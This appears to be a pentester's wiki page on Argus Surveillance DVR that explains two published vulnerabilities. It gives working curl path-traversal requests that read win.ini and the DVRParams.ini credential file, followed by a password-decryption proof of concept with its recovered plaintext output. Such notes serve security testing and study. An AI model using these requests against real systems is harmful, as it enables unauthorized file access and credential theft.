Argus Surveillance DVR

Argus Surveillance DVR is a Windows-based video surveillance application developed by PY Software for converting computers into security monitoring systems. It provides functionality for capturing video from IP cameras, webcams, and other sources, storing recordings locally, and offering remote access capabilities through a built-in web server. Configuration is stored in local .ini files under the ProgramData directory, where settings such as user accounts, camera streams, and operational parameters are defined.

The application integrates scheduling, motion detection, and multi-camera support, making it a popular choice for small businesses and home users seeking low-cost surveillance solutions. Remote access is exposed via an HTTP interface that allows configuration management and video streaming.

LFI

Argus Surveillance DVR version 4.0.0.0 is affected by a directory traversal vulnerability (CVE‑2018‑15745) due to insufficient sanitization of the RESULTPAGE parameter in WEBACCOUNT.CGI. This flaw allows unauthenticated attackers to supply path traversal sequences, enabling retrieval of arbitrary files from the host file system, including configuration files and private keys. The vulnerability arises because the CGI script does not properly validate or restrict input, allowing navigation outside the intended directory.

The DVRParams.ini file contains some configuration settings and is typically located at C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini.

$ curl "http://dvr4:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fwin.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" -

# Configuration file
$ curl "http://dvr4:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2f..%5cprogramdata%5cPY_Software%5cArgus+surveillance+dvr%5cdvrparams.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" --proxy 127.0.0.1:8080

Decryption

Argus Surveillance DVR version 4.0 is affected by a weak password encryption vulnerability (CVE‑2022‑25012) due to the use of insecure cryptographic methods for storing user credentials. The application does not adequately protect passwords, making them susceptible to offline recovery or brute-force attacks if configuration files or databases are accessed. The DVRParams.ini file contains the users' login details. A Python-based working PoC is available:

$ cat DVRParams.ini | grep -i "^password"
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8 # Administrator

$ python3 CVE-2022-25012.py ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
[+] Password: 14WatchD0g$
PreviousAppsNextDruva

Last updated

Was this helpful?